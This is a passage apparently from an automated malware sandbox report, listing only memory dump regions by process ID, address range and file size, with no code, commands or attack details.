                                                                                                                                                                                                                                                                              • memory/3852-614-0x00007FF825800000-0x00007FF82582C000-memory.dmp

                                                                                                                                                                                                                                                                                Filesize

                                                                                                                                                                                                                                                                                176KB

                                                                                                                                                                                                                                                                              • memory/3852-613-0x00007FF82C9A0000-0x00007FF82C9AD000-memory.dmp

                                                                                                                                                                                                                                                                                Filesize

                                                                                                                                                                                                                                                                                52KB

                                                                                                                                                                                                                                                                              • memory/3852-612-0x00007FF81E190000-0x00007FF81E509000-memory.dmp

                                                                                                                                                                                                                                                                                Filesize

                                                                                                                                                                                                                                                                                3.5MB

                                                                                                                                                                                                                                                                              • memory/3852-611-0x00007FF829360000-0x00007FF8297C6000-memory.dmp

                                                                                                                                                                                                                                                                                Filesize

                                                                                                                                                                                                                                                                                4.4MB

                                                                                                                                                                                                                                                                              • memory/3852-609-0x00007FF83A650000-0x00007FF83A65F000-memory.dmp

                                                                                                                                                                                                                                                                                Filesize

                                                                                                                                                                                                                                                                                60KB

                                                                                                                                                                                                                                                                              • memory/3852-608-0x00007FF82B6F0000-0x00007FF82B714000-memory.dmp

                                                                                                                                                                                                                                                                                Filesize

                                                                                                                                                                                                                                                                                144KB

                                                                                                                                                                                                                                                                              • memory/3852-605-0x00007FF824A00000-0x00007FF824A15000-memory.dmp

                                                                                                                                                                                                                                                                                Filesize

                                                                                                                                                                                                                                                                                84KB

                                                                                                                                                                                                                                                                              • memory/3852-604-0x00007FF823640000-0x00007FF8236F8000-memory.dmp

                                                                                                                                                                                                                                                                                Filesize

                                                                                                                                                                                                                                                                                736KB

                                                                                                                                                                                                                                                                              • memory/3852-602-0x00007FF824AD0000-0x00007FF824AFE000-memory.dmp

                                                                                                                                                                                                                                                                                Filesize

                                                                                                                                                                                                                                                                                184KB

                                                                                                                                                                                                                                                                              • memory/3852-601-0x00007FF834880000-0x00007FF83488D000-memory.dmp

                                                                                                                                                                                                                                                                                Filesize

                                                                                                                                                                                                                                                                                52KB

                                                                                                                                                                                                                                                                              • memory/4212-166-0x0000000000780000-0x000000000122C000-memory.dmp

                                                                                                                                                                                                                                                                                Filesize

                                                                                                                                                                                                                                                                                10.7MB

                                                                                                                                                                                                                                                                              • memory/4236-591-0x000001F4B1700000-0x000001F4B1722000-memory.dmp

                                                                                                                                                                                                                                                                                Filesize

                                                                                                                                                                                                                                                                                136KB

                                                                                                                                                                                                                                                                              • memory/4820-315-0x0000000000400000-0x0000000000AB3000-memory.dmp

                                                                                                                                                                                                                                                                                Filesize

                                                                                                                                                                                                                                                                                6.7MB

                                                                                                                                                                                                                                                                              • memory/5492-1077-0x000002B0C1A80000-0x000002B0C1A88000-memory.dmp

                                                                                                                                                                                                                                                                                Filesize

                                                                                                                                                                                                                                                                                32KB

                                                                                                                                                                                                                                                                              • memory/5612-977-0x00007FF828FF0000-0x00007FF829369000-memory.dmp

                                                                                                                                                                                                                                                                                Filesize

                                                                                                                                                                                                                                                                                3.5MB

                                                                                                                                                                                                                                                                              • memory/5612-978-0x00007FF8400C0000-0x00007FF8400E4000-memory.dmp

                                                                                                                                                                                                                                                                                Filesize

                                                                                                                                                                                                                                                                                144KB

                                                                                                                                                                                                                                                                              • memory/5612-986-0x00007FF83B010000-0x00007FF83B128000-memory.dmp

                                                                                                                                                                                                                                                                                Filesize

                                                                                                                                                                                                                                                                                1.1MB

                                                                                                                                                                                                                                                                              • memory/5612-982-0x00007FF83EA00000-0x00007FF83EA0D000-memory.dmp

                                                                                                                                                                                                                                                                                Filesize

                                                                                                                                                                                                                                                                                52KB

                                                                                                                                                                                                                                                                              • memory/5612-975-0x00007FF83E8C0000-0x00007FF83E978000-memory.dmp

                                                                                                                                                                                                                                                                                Filesize

                                                                                                                                                                                                                                                                                736KB

                                                                                                                                                                                                                                                                              • memory/5612-1125-0x00007FF82C3B0000-0x00007FF82C52A000-memory.dmp

                                                                                                                                                                                                                                                                                Filesize

                                                                                                                                                                                                                                                                                1.5MB

                                                                                                                                                                                                                                                                              • memory/5612-1146-0x00007FF840050000-0x00007FF840069000-memory.dmp

                                                                                                                                                                                                                                                                                Filesize

                                                                                                                                                                                                                                                                                100KB

                                                                                                                                                                                                                                                                              • memory/5612-1149-0x00007FF83E980000-0x00007FF83E9AE000-memory.dmp

                                                                                                                                                                                                                                                                                Filesize

                                                                                                                                                                                                                                                                                184KB

                                                                                                                                                                                                                                                                              • memory/5612-1152-0x000001EF77600000-0x000001EF77979000-memory.dmp

                                                                                                                                                                                                                                                                                Filesize

                                                                                                                                                                                                                                                                                3.5MB

                                                                                                                                                                                                                                                                              • memory/5612-1151-0x00007FF83E8C0000-0x00007FF83E978000-memory.dmp

                                                                                                                                                                                                                                                                                Filesize

                                                                                                                                                                                                                                                                                736KB

                                                                                                                                                                                                                                                                              • memory/5612-1169-0x00007FF828FF0000-0x00007FF829369000-memory.dmp

                                                                                                                                                                                                                                                                                Filesize

                                                                                                                                                                                                                                                                                3.5MB

                                                                                                                                                                                                                                                                              • memory/5612-1176-0x00007FF8400C0000-0x00007FF8400E4000-memory.dmp

                                                                                                                                                                                                                                                                                Filesize

                                                                                                                                                                                                                                                                                144KB

                                                                                                                                                                                                                                                                              • memory/5612-1190-0x00007FF83B010000-0x00007FF83B128000-memory.dmp

                                                                                                                                                                                                                                                                                Filesize

                                                                                                                                                                                                                                                                                1.1MB

                                                                                                                                                                                                                                                                              • memory/5612-976-0x000001EF77600000-0x000001EF77979000-memory.dmp

                                                                                                                                                                                                                                                                                Filesize

                                                                                                                                                                                                                                                                                3.5MB

                                                                                                                                                                                                                                                                              • memory/5612-981-0x00007FF840090000-0x00007FF8400BC000-memory.dmp

                                                                                                                                                                                                                                                                                Filesize

                                                                                                                                                                                                                                                                                176KB

                                                                                                                                                                                                                                                                              • memory/5612-985-0x00007FF840550000-0x00007FF840568000-memory.dmp

                                                                                                                                                                                                                                                                                Filesize

                                                                                                                                                                                                                                                                                96KB

                                                                                                                                                                                                                                                                              • memory/5612-1050-0x00007FF840070000-0x00007FF84008F000-memory.dmp

                                                                                                                                                                                                                                                                                Filesize

                                                                                                                                                                                                                                                                                124KB

                                                                                                                                                                                                                                                                              • memory/5612-974-0x00007FF82A610000-0x00007FF82AA76000-memory.dmp

                                                                                                                                                                                                                                                                                Filesize

                                                                                                                                                                                                                                                                                4.4MB

                                                                                                                                                                                                                                                                              • memory/5612-980-0x00007FF83E860000-0x00007FF83E875000-memory.dmp

                                                                                                                                                                                                                                                                                Filesize

                                                                                                                                                                                                                                                                                84KB

                                                                                                                                                                                                                                                                              • memory/5612-973-0x00007FF83E980000-0x00007FF83E9AE000-memory.dmp

                                                                                                                                                                                                                                                                                Filesize

                                                                                                                                                                                                                                                                                184KB

                                                                                                                                                                                                                                                                              • memory/5612-972-0x00007FF841660000-0x00007FF84166D000-memory.dmp

                                                                                                                                                                                                                                                                                Filesize

                                                                                                                                                                                                                                                                                52KB

                                                                                                                                                                                                                                                                              • memory/5612-971-0x00007FF840050000-0x00007FF840069000-memory.dmp

                                                                                                                                                                                                                                                                                Filesize

                                                                                                                                                                                                                                                                                100KB

                                                                                                                                                                                                                                                                              • memory/5612-970-0x00007FF82C3B0000-0x00007FF82C52A000-memory.dmp

                                                                                                                                                                                                                                                                                Filesize

                                                                                                                                                                                                                                                                                1.5MB

                                                                                                                                                                                                                                                                              • memory/5612-969-0x00007FF840070000-0x00007FF84008F000-memory.dmp

                                                                                                                                                                                                                                                                                Filesize

                                                                                                                                                                                                                                                                                124KB

                                                                                                                                                                                                                                                                              • memory/5612-968-0x00007FF840550000-0x00007FF840568000-memory.dmp

                                                                                                                                                                                                                                                                                Filesize

                                                                                                                                                                                                                                                                                96KB

                                                                                                                                                                                                                                                                              • memory/5612-967-0x00007FF840090000-0x00007FF8400BC000-memory.dmp

                                                                                                                                                                                                                                                                                Filesize

                                                                                                                                                                                                                                                                                176KB

                                                                                                                                                                                                                                                                              • memory/5612-962-0x00007FF844130000-0x00007FF84413F000-memory.dmp

                                                                                                                                                                                                                                                                                Filesize

                                                                                                                                                                                                                                                                                60KB

                                                                                                                                                                                                                                                                              • memory/5612-961-0x00007FF8400C0000-0x00007FF8400E4000-memory.dmp

                                                                                                                                                                                                                                                                                Filesize

                                                                                                                                                                                                                                                                                144KB

                                                                                                                                                                                                                                                                              • memory/5612-960-0x00007FF82A610000-0x00007FF82AA76000-memory.dmp

                                                                                                                                                                                                                                                                                Filesize

                                                                                                                                                                                                                                                                                4.4MB

                                                                                                                                                                                                                                                                              • memory/5612-979-0x00007FF844130000-0x00007FF84413F000-memory.dmp

                                                                                                                                                                                                                                                                                Filesize

                                                                                                                                                                                                                                                                                60KB

                                                                                                                                                                                                                                                                              • memory/5832-701-0x000002642E980000-0x000002642E988000-memory.dmp

                                                                                                                                                                                                                                                                                Filesize

                                                                                                                                                                                                                                                                                32KB

                                                                                                                                                                                                                                                                              • memory/6100-925-0x0000000000400000-0x0000000000AB3000-memory.dmp

                                                                                                                                                                                                                                                                                Filesize

                                                                                                                                                                                                                                                                                6.7MB